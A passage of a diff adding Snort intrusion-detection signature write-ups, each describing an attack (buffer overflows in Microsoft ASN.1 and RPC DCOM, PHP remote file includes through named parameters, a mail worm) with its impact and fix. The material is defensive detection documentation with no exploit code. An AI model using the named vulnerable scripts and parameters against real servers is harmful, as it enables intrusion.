+anonymously using the password '-iss@iss'
+
+--
+
+Affected Systems:
+Machines running anonymous ftp servers.
+
+--
+
+Attack Scenarios:
+An attacker scans a range of IPs using the ISS Scanner, checking for 
+known vulnerabilities. If the scanner encounters a ftp server, it tries 
+to log in .
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+A user may be using that same password for a legitimate 
+anonymous login.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Disable anonymous FTP access.
+
+--
+
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS331
+
+--
--- /dev/null
+++ b/doc/signatures/3004.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid:
+3004
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the Microsoft implementation of the ASN.1 Library.
+
+--
+Impact:
+Serious. Execution of arbitrary code, DoS.
+
+--
+Detailed Information:
+A buffer overflow condition in the Microsoft implementation of the ASN.1 
+Library. It may be possible for an attacker to exploit this condition by 
+sending specially crafted authentication packets to a host running a 
+vulnerable operating system.
+
+When the taget system decodes the ASN.1 data, exploit code may be included 
+in the data that may be excuted on the host with system level privileges. 
+Alternatively, the malformed data may cause the service to become 
+unresponsive thus causing the DoS condition to occur.
+
+--
+Affected Systems:
+	Microsoft Windows NT
+	Microsoft Windows NT Terminal Server Edition
+	Microsoft Windows 2000
+	Microsoft Windows XP
+	Microsoft Windows 2003
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0818
+
+US-CERT
+http://www.us-cert.gov/cas/techalerts/TA04-041A.html
+
+Microsoft
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms04-007.asp
+
+--
--- /dev/null
+++ b/doc/signatures/969.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+969
+
+--
+Summary:
+This event is generated when an attempt is made to request a file by the HTTP LOCK method.
+
+--
+Impact:
+Denial of service.  Repeated successful attempts can consume all CPU resources subsequently crashing the victim server. 
+
+--
+Detailed Information:
+The WebDAV (Web Distributed Authoring and Versioning) component of Microsoft's Internet Information Services (IIS) provides extensions to the HTTP protocol allowing users to edit and manage files on the remote web server.  A specially crafted request processed by WebDAV can consume CPU resources on the web server host causing it to crash.
+
+--
+Affected Systems:
+Windows 2000 systems running IIS 5.0.
+
+--
+Attack Scenarios:
+An attacker can craft an HTTP request processed by WebDAV that exhausts CPU resources and causes the system to crash. 
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Consider using the IIS Lockdown Tool to disable WebDAV if it is not necessary.
+
+Download and install the appropriate patch mentioned in the Microsoft bulletin.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/2736
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/ms01-016.asp
+
+--
--- /dev/null
+++ b/doc/signatures/2604.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2604
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "create_mview_repgroup" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "fname" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck633.html
+
+--
--- /dev/null
+++ b/doc/signatures/2361.txt
@@ -0,0 +1,63 @@
+Rule:  
+
+--
+Sid:
+2361
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application YaBB SE.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+YaBB SE contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating the variable template
+in the script news.php when making a GET or POST  request  to a 
+vulnerable system.
+
+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root.
+
+--
+Affected Systems:
+	YaBB SE YaBB SE 0.8
+	YaBB SE YaBB SE 1.4.1
+	YaBB SE YaBB SE 1.5 .0
+
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and define their
+own path to the template variable.
+
+--
+Ease of Attack:
+Simple. No exploit software required. Exploit code exists.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1931.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1931
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000395.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000395
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "posts.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "posts.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1356.txt
@@ -0,0 +1,48 @@
+Rule:
+
+--
+Sid:
+1350
+
+--
+Summary:
+Attempted perl access via web
+
+--
+Impact:
+Attempt to execute a perl script on a host.
+
+--
+Detailed Information:
+This is an attempt to execute a perl script on a host. Perl is a scripting language that is available on a wide variety of platforms. By default perl code runs with full access to all libraries and inbuilt commands available to the language. When combined with the access permissions of the user executing the script, the consequences of running arbitrary code can be devastating
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP transaction that includes a reference to perl in the URI.
+
+--
+Ease of Attack:
+Simple HTTP.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. perl may also be requested on a command line should the attacker gain access to the machine. Whenever possible, all perl scripts on the host should be written using the restriceted access mode. This forces perl to execute the scripts in a "sandbox" which will disallow unsafe operations in the code.
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+sid: 1349
+
+--
--- /dev/null
+++ b/doc/signatures/100000718.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000718
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHPRaid" application running on a webserver. Access to the file "guilds.php" using a remote file being passed as the "phpraid_dir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpraid_dir" parameter in the "guilds.php" script used by the "PHPRaid" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPRaid
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3346.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3346
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/842.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+842
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1757.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1757
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1279.txt
@@ -0,0 +1,68 @@
+Rule:
+
+
+--
+Sid:
+1279
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) snmpXdmi is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port snmpXdmi is using.  Attackers can also learn what versions of the snmpXdmi protocol are accepted by snmpXdmi.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as snmpXdmi run.  Simple Network Management Protocol (SNMP) and Desktop Management Interface (DMI) are remote management protocols.  The snmpXdmi RPC service translates between SNMP and DMI allowing, the use of either or both.  There is a buffer overflow when translating DMI to SNMP that allows access with the privilege level of snmpXdmi.
+
+--
+Affected Systems:
+Sun Solaris 2.6, 7.0, and 8.0.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where snmpXdmi runs.  This may be a precursor to accessing snmpXdmi.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access snmpXdmi, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for snmpXdmi, not probes of the snmpXdmi service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the snmpXdmi service itself. An attacker may attempt to go directly to the snmpXdmi port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0236
+
+CERT
+http://www.cert.org/advisories/CA-2001-05.html
+
+Bugtraq
+http://www.securityfocus.com/bid/2417
+
+
+--
--- /dev/null
+++ b/doc/signatures/2461.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2461
+
+--
+Summary:
+This event is generated when a user on a host in your network that is 
+running Yahoo Instant Messenger is viewing a webcam or listening to an 
+audio message of another Yahoo IM user.
+
+--
+Impact:
+Possible policy violation.  Instant Messenger programs may not be 
+appropriate in certain network environments.
+
+--
+Detailed Information:
+This event indicates that a Yahoo IM user in your network is requesting 
+to view a webcam of another Yahoo IM user.  While there are no known 
+exploits associated with showing or viewing webcams, or listening to 
+audio messages.  it is possible that this activity is inappropriate in 
+certain environments.
+
+--
+Affected Systems:
+Any host running Yahoo Instant Messenger.
+
+--
+Attack Scenarios:
+No known attack scenarios.
+
+--
+Ease of Attack:
+No known attack scenarios.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+It may be possible for Yahoo IM traffic to use other ports than the 
+default expected ones.  
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or 
+implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+--
+Additional References:
+Yahoo Protocol
+http://www.cse.iitb.ac.in/~varunk/YahooProtocol.htm
+
+--
--- /dev/null
+++ b/doc/signatures/735.txt
@@ -0,0 +1,91 @@
+Rule:
+
+--
+Sid:
+735
+
+
+--
+Summary:
+This event is generated when worm activity is detected. More specifcally
+this event indicates possible "My Romeo" propogation.
+
+--
+Impact:
+Serious. The victim host may be infected with a worm.
+
+--
+Detailed Information:
+This worm propogates via electronic mail and exploits a known
+vulnerability in the way that versions of Microsoft Outlook and Internet
+Explorer handle trusted HTML pages. The worm is launched via a compiled
+HTML file (.chm) which is used by Microsoft WIndows Help.
+
+The executable part of the worm is called from within the trusted
+compiled HTML file. The worm attempts to propagate using hard coded
+addresses of SMTP servers.
+
+This worm is also Known As: Romeo and Juliet, W32/Verona, TrojBlebla.A
+
+--
+Affected Systems:
+	Microsoft Windows 9x
+	Microsoft Windows 2000
+
+--
+Attack Scenarios:
+Symantec Anti-Virus center states that the worm arrives as an email
+message that has an HTML body and two attachments named Myjuliet.chm
+and Myromeo.exe. The subject of the email is selected at random from
+the following set:
+
+Romeo&Juliet
+hello world
+subject
+ble bla, bee
+I Love You ;)
+sorry...
+Hey you !
+Matrix has you...
+my picture
+from shake-beer
+
+--
+Ease of Attack:
+Simple. This is worm activity.
+
+--
+False Positives:
+Legitimate electronic mail containing the known subject lines used by
+MyRomeo may cause this rule to generate an event.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches and service packs.
+
+Use Anti-Virus software to detect and delete virus laden email.
+
+This worm makes changes to the system registry, removal of the affected
+registry keys should be done using an appropriate virus removal tool or
+by an experienced Windows administrator.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+McAfee
+http://vil.nai.com/vil/content/v_98894.htm
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/w32.blebla.worm.html
+
+--
--- /dev/null
+++ b/doc/signatures/2219.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2219
+
+--
+Summary:
+This event is generated when an attempt is made to access setpasswd.cgi on an internal web server. This may indicate an attempt to exploit an authentication vulnerability in Trend Micro Interscan VirusWall 3.0.1 and 3.6.x.
+
+--
+Impact:
+Information disclosure, VirusWall administrative access.
+
+--
+Detailed Information:
+Trend Micro Interscan VirusWall contains an authentication vulnerability in versions 3.6.x and lower. When an administrative user changes their VirusWall account password using setpasswd.cgi, the username and password are transmitted in clear text. If an attacker is monitoring network traffic, he/she can obtain the username and password for VirusWall administration.
+
+--
+Affected Systems:
+Systems running Trend Micro Interscan VirusWall 3.0.1 or 3.6.x.
+
+--
+Attack Scenarios:
+An attacker is monitoring network traffic and intercepts the HTTP message that contains the VirusWall administrator's username and password. The attacker can then use this information to log into VirusWall and make changes to system configuration that may leave the network more open to compromise.
+ 
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+If a legitimate remote user accesses setpasswd.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to a newer version of Trend Micro VirusWall. Otherwise, do not use web-based configuration tools.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/2212
+
+--
--- /dev/null
+++ b/doc/signatures/1888.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+1188
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in WS_FTP.
+
+--
+Impact:
+Serious. Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+Executing  site cpwd with an specially crafted argument can cause a buffer
+overflow in WS_FTP that would allow arbitrary code to be run on the ftp
+server.
+
+The 'site cpwd' command seems to be unique to ws_ftp. This command is used
+to allow users to change there passwords while using an ftp session. It is
+possible to execute 'site cpwd' with an specially crafted argument can cause
+a buffer overflow in WS_FTP. This would allow arbitrary code to be run on
+the ftp server. This requires that the user be logged into the ftp server
+before executing the 'site cpwd' command.
+
+--
+Affected Systems:
+	WS_FTP up to an including 3.12
+
+--
+Attack Scenarios:
+An attacker needs to authenticate to an ftp server running the affected
+software then supply a specially crafted command to cause the buffer
+overflow condition to occur.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+'site cpwd' is a valid command on ws_ftp and users may be allowed to change
+their passwords.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+Consider using scp as a secure replacement for ftp.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Ian Macdonald
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3402.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3402
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/965.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+965
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	Systems using Microsoft FrontPage Server Extensions 98
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=http://support.microsoft.com:80/support/kb/articles/Q188/2/57.ASP&NoWebContent=1&NoWebContent=1
+
+--
--- /dev/null
+++ b/doc/signatures/100000743.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000743
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Plume CMS" application running on a webserver. Access to the file "dbinstall.php" using a remote file being passed as the "_PX_config[manager_path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "_PX_config[manager_path]" parameter in the "dbinstall.php" script used by the "Plume CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Plume CMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/436.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+436
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Redirect for the Type of Service and Host datagram.
+
+--
+
+Impact:
+Redirect messages are normally an indication that a shorter route to a particular destination exists.  
+
+--
+
+Detailed Information:
